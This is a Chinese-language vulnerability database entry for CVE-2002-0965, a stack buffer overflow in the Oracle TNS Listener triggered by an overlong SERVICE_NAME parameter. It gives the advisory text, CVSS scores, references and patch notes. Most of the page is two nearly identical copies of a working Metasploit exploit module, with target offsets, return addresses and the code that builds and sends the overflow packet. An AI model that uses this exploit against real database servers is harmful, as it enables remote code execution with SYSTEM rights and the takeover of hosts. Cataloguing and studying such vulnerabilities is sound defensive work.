CVE-2002-0965
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:25
NMCOEP    

[原文]Buffer overflow in TNS Listener for Oracle 9i Database Server on Windows systems, and Oracle 8 on VM, allows local users to execute arbitrary code via a long SERVICE_NAME parameter, which is not properly handled when writing an error message to a log file.


[CNNVD]Oracle TNS Listener远程缓冲区溢出漏洞(CNNVD-200210-206)

        
        TNS Listener是一款Oracle数据库的组件,由Oracle公司分发和维护。
        Oracle TNS Listener存在缓冲区溢出漏洞,可导致远程攻击者以TNSListener进程的权限在目标系统上执行任意指令。
        Listener在TCP 1521端口监听来自己客户机的连接,客户机连接以后会发送一个类似如下的请求给数据库服务器处理:
        (DESCRIPTION=(ADDRESS=
        (PROTOCOL=TCP)(HOST=x.x.x.x)
        (PORT=1521))(CONNECT_DATA=
        (SERVICE_NAME=myorcl.ngssoftware.com)
        (CID=
        (PROGRAM=X:\\ORACLE\\iSuites\\BIN\\SQLPLUSW.EXE)
        (HOST=foo)(USER=bar))))
        通过提交一个超长的SERVICE_NAME参数,当程序在日志文件中生成一条错误消息时会导致缓冲区溢出,远程攻击者可能利用此溢出攻击在目标系统上执行任意指令。在Windows系统上指令是以SYSTEM的权限执行的,因此攻击者能获得主机的管理权限。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:oracle:oracle9i:9.0
cpe:/a:oracle:oracle9i:9.0.1
cpe:/a:oracle:oracle9i:9.0.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0965
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0965
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-206
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/630091
(UNKNOWN)  CERT-VN  VU#630091
http://www.securityfocus.com/bid/4845
(VENDOR_ADVISORY)  BID  4845
http://otn.oracle.com/deploy/security/pdf/net9_dos_alert.pdf
(VENDOR_ADVISORY)  CONFIRM  http://otn.oracle.com/deploy/security/pdf/net9_dos_alert.pdf
http://www.iss.net/security_center/static/9288.php
(UNKNOWN)  XF  oracle-listener-servicename-bo(9288)
http://online.securityfocus.com/archive/1/276526
(UNKNOWN)  BUGTRAQ  20020612 Oracle TNS Listener Buffer Overflow (#NISR12062002A)
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0096.html
(UNKNOWN)  VULNWATCH  20020612 [VulnWatch] Oracle TNS Listener Buffer Overflow (#NISR12062002A)

- 漏洞信息

Oracle TNS Listener远程缓冲区溢出漏洞
高危 未知
2002-10-04 00:00:00 2005-05-02 00:00:00
远程  
        
        TNS Listener是一款Oracle数据库的组件,由Oracle公司分发和维护。
        Oracle TNS Listener存在缓冲区溢出漏洞,可导致远程攻击者以TNSListener进程的权限在目标系统上执行任意指令。
        Listener在TCP 1521端口监听来自己客户机的连接,客户机连接以后会发送一个类似如下的请求给数据库服务器处理:
        (DESCRIPTION=(ADDRESS=
        (PROTOCOL=TCP)(HOST=x.x.x.x)
        (PORT=1521))(CONNECT_DATA=
        (SERVICE_NAME=myorcl.ngssoftware.com)
        (CID=
        (PROGRAM=X:\\ORACLE\\iSuites\\BIN\\SQLPLUSW.EXE)
        (HOST=foo)(USER=bar))))
        通过提交一个超长的SERVICE_NAME参数,当程序在日志文件中生成一条错误消息时会导致缓冲区溢出,远程攻击者可能利用此溢出攻击在目标系统上执行任意指令。在Windows系统上指令是以SYSTEM的权限执行的,因此攻击者能获得主机的管理权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 建议以低权限的帐户运行TNSListener,或者使用访问控制限制用户访问。
        厂商补丁:
        Oracle
        ------
        目前厂商已经发布了针对此安全漏洞的补丁,请到下面的网站下载:
        补丁号:2367681
        
        http://metalink.oracle.com

- 漏洞信息 (16341)

Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow (EDBID:16341)
windows remote
2010-11-24 Verified
0 metasploit
N/A [点击下载]
##
# $Id: tns_service_name.rb 11128 2010-11-24 19:43:49Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Oracle. When
				sending a specially crafted packet containing a long SERVICE_NAME
				to the TNS service, an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11128 $',
			'References'     =>
				[
					[ 'CVE', '2002-0965'],
					[ 'OSVDB', '5041'],
					[ 'BID', '4845'],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
					[ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'May 27 2002'))

		register_options([Opt::RPORT(1521)], self.class)
	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"
		pkt = tns_packet(version)
		sock.put(pkt)

		sock.get_once
		res = sock.get_once(-1, 1)

		disconnect

		if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
		buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
		buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400)

		sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))"

		pkt = tns_packet(sploit)

		print_status("Trying target #{target.name}...")
		sock.put(pkt)

		handler

		disconnect
	end

end
		

- 漏洞信息 (F83091)

Oracle TNS Listener SERVICE_NAME Buffer Overflow. (PacketStormID:F83091)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2002-0965
[点击下载]

This Metasploit module exploits a stack overflow in Oracle. When sending a specially crafted packet containing a long SERVICE_NAME to the TNS service, an attacker may be able to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.',
			'Description'    => %q{
				This module exploits a stack overflow in Oracle. When
				sending a specially crafted packet containing a long SERVICE_NAME 
				to the TNS service, an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,			
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2002-0965'],
					[ 'OSVDB', '5041'],
					[ 'BID', '4845'],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
					[ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'May 27 2002'))

			register_options([Opt::RPORT(1521)], self.class)

	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"
	
		pkt = tns_packet(version)

		sock.put(pkt)
		
		sock.get_once

		res = sock.get_once(-1, 1)
		
		disconnect

			if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
				return Exploit::CheckCode::Vulnerable
			end
				return Exploit::CheckCode::Safe
	end

	def exploit
		connect

			buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
			buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
			buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400)

			sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))"
			
			pkt = tns_packet(sploit)

			print_status("Trying target #{target.name}...")
			sock.put(pkt)

			handler

		disconnect
	end

end
    

- 漏洞信息

5041
Oracle 9i TNS Listener SERVICE_NAME Parameter Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified, Vendor Verified, Coordinated Disclosure

- 漏洞描述

A buffer overflow exists in Oracle. The TNS Listener fails to validate SERVICE_NAME parameters resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2002-06-12 Unknow
Unknow 2002-06-12

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Oracle has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站